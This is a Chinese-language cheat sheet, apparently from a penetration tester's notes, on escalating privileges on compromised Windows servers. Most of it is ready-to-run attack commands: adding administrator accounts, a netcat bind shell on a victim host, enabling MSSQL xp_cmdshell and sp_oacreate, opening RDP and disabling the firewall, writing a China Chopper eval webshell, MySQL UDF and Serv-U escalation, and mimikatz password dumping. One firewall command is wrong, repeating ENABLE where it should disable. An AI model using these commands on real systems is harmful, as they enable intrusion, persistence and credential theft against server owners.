提權小結
文件權限配置不當提權
普通提權
直接執行開啟3389端口,執行net user username password /add & net localgroup administrators usernames /add
如果cmd被禁用,可嘗試找可讀、可寫、可執行目錄上傳cmd.exe,然后遠程連接。
啟動項提權
| @echo off net user new222 123.com /add net localgroup administrators new222 /add |
將上述代碼保存為1.bat文件
再將1.bat拷貝到C:\Documents and Settings\All Users\「開始」菜單\程序\啟動\ 目錄下,重啟服務器即可。
NC反彈提權
找可讀可寫目錄,上傳nc.exe和cmd.exe (這里我均上傳在c:\inetpub\ 目錄下)
執行c:\inetpub\nc.exe -l -p 8888 -t -e c:\inetpub\Cmd.exe
打開本地dos: telnet 192.168.0.112 8888 (192.168.0.112為肉雞ip)
發現變成肉雞的shell
這里發現當前權限較小,可嘗試通過pr.exe執行命令。
溢出提權
pr提權
在上傳大馬,拿下shell后,嘗試執行net user
發現拒絕訪問,沒有權限
找可讀可寫目錄,上傳cmd.exe。
這里上傳到C:\Inetpub\
執行whoami,發現權限為network service,較低。執行net user admin1 admin1 /add失敗,沒有權限。
執行systeminfo發現沒有打補丁,上傳pr.exe.
這里上傳到C:\Inetpub\
使用pr.exe執行whoami,發現已經是system權限。接着可以創建用戶。。。
Ps:這里環境有問題,用公司的2003做的同樣操作,復現
Churrasco提權
用法同pr提權,原理一樣。
數據庫提權
必須具備數據庫管理員權限才能執行提權操作。例如sqlmap里面 --is-dba
Mssql
Mssql-xp_cmdshell提權
使用sqltools工具,利用xp_cmdshell提權。
這里沒有搭建環境,沒法復現了。這里默認是允許外連的情況。
按照下面輸入賬號密碼,執行系統命令一通操作,即提權成功。
如果'xp-cmdshell'不存在,執行:
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'user connections',1;
RECONFIGURE;
如果xp_cmdshell組件沒有開啟,可以執行命令開啟
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; //開啟xp_cmdshell
可以執行exec xp_cmdshell 'whoami' 查看是否開啟成功
#關閉xp_cmdshell:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE; //關閉xp_cmdshell
#附:
| MSSQL語句開啟3389: exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
MSSQL語句關閉3389: exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;-- |
| dos命令開啟3389 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
dos命令關閉3389 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f |
| win7及以上 netsh advfirewall set allprofiles state on //開啟防火牆 netsh advfirewall set allprofiles state off //關閉防火牆
win2003系統使用如下命令 netsh firewall set opmode mode=ENABLE //開啟防火牆 netsh firewall set opmode mode=ENABLE //關閉防火牆 |
此時,可以寫入一句話,連菜刀:
exec xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["chopper"],"unsafe");%^> > d:/a/muma.aspx'
使用菜刀可以上傳文件,配合上傳做一些操作。比如上傳“Getpass”等敏感文件。
如果沒有開啟外連,可以使用大馬里面的SQL-sa提權。
如果沒有開啟外連也沒有開啟xp_cmdshell組件,同樣上傳aspx大馬開組件,提權。
Mssql-sp_oacreate提權
前提:
如果xp_cmdshell組件被刪除了話,還可以使用sp_oacreate來進行提權。
開啟sp_oacreate
| exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE; //開啟sp_oacreate |
##關閉sp_oacreate
| exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',0;RECONFIGURE; //關閉sp_oacreate |
創建賬號:
declare @shell int
exec sp_oacreate 'wscript.shell', @shell out
exec sp_method @shell, 'run' , null, 'c:\windows\system32\cmd.exe \c "net user test pinohd123. /add" '
參考:https://www.jianshu.com/p/e79d2a42338b
Mysql
udf提權
上傳udf提權馬。Ps:這里是tools提權馬
由於mysql版本大於5.1,創建plugin目錄。
導出udf.dll文件
創建函數
執行命令,發現是管理員權限
創建用戶
成功執行。
Nc端口轉發提權
通過大馬創建端口轉發函數,執行反彈:
本地監聽
第三方軟件提權
Server-U提權
查看是否有修改權限,如果有讀寫權限,修改server-u默認安裝目錄下面的SerUDaemon.ini文件,創建ftp用戶,連接,執行命令創建用戶:
quote site exec net user aa 123.com /add
quote site exec net localgroup administrators aa/add
如果沒有修改權限,可以使用大馬serv-u提權進行溢出提權。
注:43958是serv-u默認的端口。
嘗試在ServUDaemon.ini配置文件里面,創建新的用戶,輔助提權。
發現沒有權限寫入,這里不再嘗試破解hash。而是通過大馬所帶“ServU-提權”進行溢出提權。
如果管理員修改密碼,可以嘗試把ServUAdmin.exe下載到本地,使用C32Asm.exe以16進制打開,ctrl+F查找,使用ANSI類型搜索,查找真實密碼。如下:
破解hash提權
Getpass
這里在win2003沒有試驗成功,后在2008上面能復現。如下:
Pwdump7
mimikatz
第一條:privilege::debug
//提升權限
第二條:sekurlsa::logonpasswords
//抓取密碼
